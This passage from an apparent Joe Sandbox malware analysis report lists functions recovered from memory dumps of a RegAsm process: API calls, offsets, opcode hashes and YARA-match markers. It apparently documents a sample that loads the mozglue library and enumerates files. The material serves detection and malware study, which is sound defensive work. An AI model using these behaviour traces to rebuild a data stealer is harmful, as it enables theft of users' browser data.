                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C82CFAE,?,?,?,6C7F31A7), ref: 6C8305FB
                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C82CFAE,?,?,?,6C7F31A7), ref: 6C830616
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C7F31A7), ref: 6C83061C
                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C7F31A7), ref: 6C830627
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _writestrlen
                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                  • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a61f7fb5c1a929388e1e4f7ce94759324b66fc006a3e6319a79e54543122310
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94d12b8f73fd4d4bb86b10fa4844cd085973701bd829fc669bb6d22d840c8f3f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a61f7fb5c1a929388e1e4f7ce94759324b66fc006a3e6319a79e54543122310
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E08CE2A0116037F924225AAC8ADBB761CDBC6538F080039FD0D83702E94AAD1A91F6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8005F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: e1cbde3f9955cb05b064817fab9232b45411fc927faaa7f29b102fdaeca37334
                                                                                                                                                                                                                                                                                                  • Instruction ID: dd07d9f8206687100783fb9317bb7a1bc7cadbd518ce121211e0050354b5e31e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1cbde3f9955cb05b064817fab9232b45411fc927faaa7f29b102fdaeca37334
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8A15870A007558FDB24CF29CA94A9DFBF1BF49304F448A6ED44A97B01E730A985CFA0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8514A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8514C5
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8514E2
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C851546
                                                                                                                                                                                                                                                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C8515BA
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C8516B4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1909280232-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 01d329519d87ce10f1aed1e1e9642fdaf6bc69f14b1710f28c81561be63d55a7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 43418f00c4ae72a2a25a39fd50fcc2839f35beaf23b6862662fc6d8409dec652
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01d329519d87ce10f1aed1e1e9642fdaf6bc69f14b1710f28c81561be63d55a7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6761E171A007149BDB218F25C980BDEB7B1BF89308F44892CED8A57701EB70E958CB91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411FA0 Relevance: 9.1, APIs: 6, Instructions: 115stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411FE0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00427328,?,?,?,00000000), ref: 0041202C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0042732C,00000000,?,?,?,00000000), ref: 00412072
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00427330,?,?,?,00000000), ref: 0041209E
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00427334,?,?,?,00000000), ref: 004120CA
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004120FC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strtok_s
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3330995566-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a867f589a2270cc097cc8dc9ee75a84affa8ab41586eaa325bb300c340c361e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 516accbb6ad73ddd64b0bcfde296236ffb43ab4a50d7e0c04c697361f0d5cb24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a867f589a2270cc097cc8dc9ee75a84affa8ab41586eaa325bb300c340c361e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB41E470500201DFC720CF58C944BF6BBB8FF18304F60865EE601D3291DBB8A6A8DB9A
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C84DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84DC60
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C84D38A,?), ref: 6C84DC6F
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,6C84D38A,?), ref: 6C84DCC1
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C84D38A,?), ref: 6C84DCE9
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C84D38A,?), ref: 6C84DD05
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C84D38A,?), ref: 6C84DD4A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 126e2cadca02a5c5b8eafdf04010740ed07c521f826ccfc4fdae5c8e51cef56e
                                                                                                                                                                                                                                                                                                  • Instruction ID: b920b97221829eff998bad37695137e488407c33144dc1629c2b5dbc5231c37a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 126e2cadca02a5c5b8eafdf04010740ed07c521f826ccfc4fdae5c8e51cef56e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71416DB5A00619CFCB20CF99C98499EB7F6FF89318B55896AD945A7B11D731FC00CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0041BF07 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041BF15
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A8F3: __mtinitlocknum.LIBCMT ref: 0041A909
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A8F3: __amsg_exit.LIBCMT ref: 0041A915
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A8F3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452,?,?,0041955B,00000000,0042D6E0,004195A2,0040FC50), ref: 0041A91D
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(0042D668,00000020,0041C058,00000000,00000001,00000000,?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D), ref: 0041BF51
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452), ref: 0041BF62
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B4DA: EncodePointer.KERNEL32(00000000,0041F0AC,00640400,00000314,00000000,?,?,?,?,?,0041C26F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B4DC
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(-00000004,?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452), ref: 0041BF88
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452), ref: 0041BF9B
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452), ref: 0041BFA5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2005412495-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2cb407143216f7dcdd8d382b271f5ba639c679548ea3be99150ba69b37ec4ebc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 12baece5bebf782a7eb6a3275de27d100d6fb3587b124a7a641d24b1edf37509
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb407143216f7dcdd8d382b271f5ba639c679548ea3be99150ba69b37ec4ebc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2311830A0031ADFDF11AFA9DD846EDBAB1FF49315F10802BE510A6251DBBD4992CF99
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C836590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA80: GetCurrentThreadId.KERNEL32 ref: 6C82FA8D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA80: AcquireSRWLockExclusive.KERNEL32(6C87F448), ref: 6C82FA99
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C836727
                                                                                                                                                                                                                                                                                                  • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C8367C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C844290: memcpy.VCRUNTIME140(?,?,6C852003,6C850AD9,?,6C850AD9,00000000,?,6C850AD9,?,00000004,?,6C851A62,?,6C852003,?), ref: 6C8442C4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                                                  • String ID: data
                                                                                                                                                                                                                                                                                                  • API String ID: 511789754-2918445923
                                                                                                                                                                                                                                                                                                  • Opcode ID: 59560f65df842734ce56148546927d12fa15bc0c73d70ce8e55f3a6d0b25dc9e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a012ccfad9b9f76f2b16699b02b75ec54e98491dd9120ca0e466088d2054585
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59560f65df842734ce56148546927d12fa15bc0c73d70ce8e55f3a6d0b25dc9e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21D1BE75A083508BD730CF69CA44B9EB7E1BFC5308F509D2ED48987B51EB30A849CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0041ACE0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041ACEC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B644: __getptd_noexit.LIBCMT ref: 0041B647
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B644: __amsg_exit.LIBCMT ref: 0041B654
                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0041AD0C
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041AD1C
                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041AD39
                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041AD4C
                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0042E1C0), ref: 0041AD64
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3470314060-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: fd26fc3cf11281d5bdea6ae3e089808d590da5e0cc94bcecac92a17d7b331242
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5cedb102cad864e6df433dc2324d4bf44794cbb6b6cbe7f796020c491a46b46f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd26fc3cf11281d5bdea6ae3e089808d590da5e0cc94bcecac92a17d7b331242
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A101A531A02A11ABD720AF66A4057DE77A1BF00725F58402BF400A3690C77C5DE2CBDF
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C82D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C7FEB57,?,?,?,?,?,?,?,?,?), ref: 6C82D652
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C7FEB57,?), ref: 6C82D660
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C7FEB57,?), ref: 6C82D673
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C82D888
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID: |Enabled
                                                                                                                                                                                                                                                                                                  • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                                                                                                  • Opcode ID: 619e0ad1664e0977f0eae50f645cb528fa59f5df356e7864c8a5878606ef89ff
                                                                                                                                                                                                                                                                                                  • Instruction ID: c96a7f5e5a6dbfba376b43a6f0426693bd2f7060e91537d94baa9e1ec962c03f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 619e0ad1664e0977f0eae50f645cb528fa59f5df356e7864c8a5878606ef89ff
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8A1F770A042188FDB21CF69C588BAEBFF1AF49318F14486DD8956B741D738A885CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00417380 Relevance: 8.9, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000104,01572220), ref: 004173F7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0041741E
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041743E
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00417452
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,015644A8), ref: 00417465
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00417479
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01571B60), ref: 0041748D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417140: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041716E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417140: HeapAlloc.KERNEL32(00000000), ref: 00417175
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417140: wsprintfA.USER32 ref: 0041718E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417140: FindFirstFileA.KERNEL32(?,?), ref: 004171A5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
